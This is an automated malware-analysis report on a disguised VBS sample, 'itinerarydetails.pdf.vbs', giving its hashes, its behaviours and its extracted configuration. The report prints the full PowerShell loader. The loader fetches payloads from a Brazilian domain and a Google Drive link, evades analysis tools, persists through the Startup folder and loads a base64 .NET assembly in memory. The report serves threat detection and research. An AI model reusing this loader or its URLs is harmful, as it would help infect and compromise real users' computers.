
General

  • Target

    itinerarydetails.pdf.vbs

  • Size

    97KB

  • Sample

    241211-t9ehtswjak

  • MD5

    a64af1eb173a81ce83d8688582925a20

  • SHA1

    0c4fbcfe1313d577199dacd5593824344e61ab1a

  • SHA256

    c32c454ae2dba633e5f9e7222bb06a49c2841886689b7b4961013ec3dc9e722e

  • SHA512

    82f7195508c8cb1abd524f94783bf352d46918090ab8c51a50a73d83e176573f8175769a4fe90fbac2c0bb83d516f8058bca89e9a8acda810f66adc92de2da16

  • SSDEEP

    768:MjjjjjjjDWuF78+OUCp+aejjjjjjjjjjjjjjjjj3:tuFvYQX

Score
10/10

Malware Config

Extracted

Language
ps1
Source
; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$crymz = 'https://drive.google.com/uc?export=download&id=';$TcedQ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $TcedQ ) {$crymz = ($crymz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$crymz = ($crymz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$qpzdg = (New-Object Net.WebClient);$qpzdg.Encoding = [System.Text.Encoding]::UTF8;$qpzdg.DownloadFile($crymz, ($HzOMj + '\Upwin.msu') );$TzvFQ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\itinerarydetails.pdf.vbs' -Destination ( $TzvFQ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){
}
else{
Restart-Computer -force ;
exit;
};$pdtzp = ('https://desckvbrat.com.br/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$cRmec = $webClient.DownloadString( $pdtzp ) ;$cRmec | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$ufKME = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $ufKME ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$frFmc = '$sNwoM = ''C:\Users\Admin\AppData\Local\Temp\itinerarydetails.pdf.vbs'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$frFmc += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$frFmc += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$frFmc += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$frFmc += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/Z5ARx/r/ee.etsap//:sptth'' , $sNwoM , ''DD1DRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$frFmc | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};
URLs
ps1.dropper

https://desckvbrat.com.br/Upcrypter/01/DLL01.txt

exe.dropper

https://drive.google.com/uc?export=download&id=

exe.dropper

https://desckvbrat.com.br/Upcrypter/01/DLL01.txt

Targets

    • Target

      itinerarydetails.pdf.vbs

    • Size

      97KB

    • MD5

      a64af1eb173a81ce83d8688582925a20

    • SHA1

      0c4fbcfe1313d577199dacd5593824344e61ab1a

    • SHA256

      c32c454ae2dba633e5f9e7222bb06a49c2841886689b7b4961013ec3dc9e722e

    • SHA512

      82f7195508c8cb1abd524f94783bf352d46918090ab8c51a50a73d83e176573f8175769a4fe90fbac2c0bb83d516f8058bca89e9a8acda810f66adc92de2da16

    • SSDEEP

      768:MjjjjjjjDWuF78+OUCp+aejjjjjjjjjjjjjjjjj3:tuFvYQX

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Drops startup file

    • Command and Scripting Interpreter: PowerShell

      Uses the powershell.exe command.

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Enterprise v15

Tasks
